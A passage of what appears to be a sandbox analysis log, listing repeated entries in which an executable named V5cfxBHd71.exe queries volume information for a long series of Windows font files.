          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
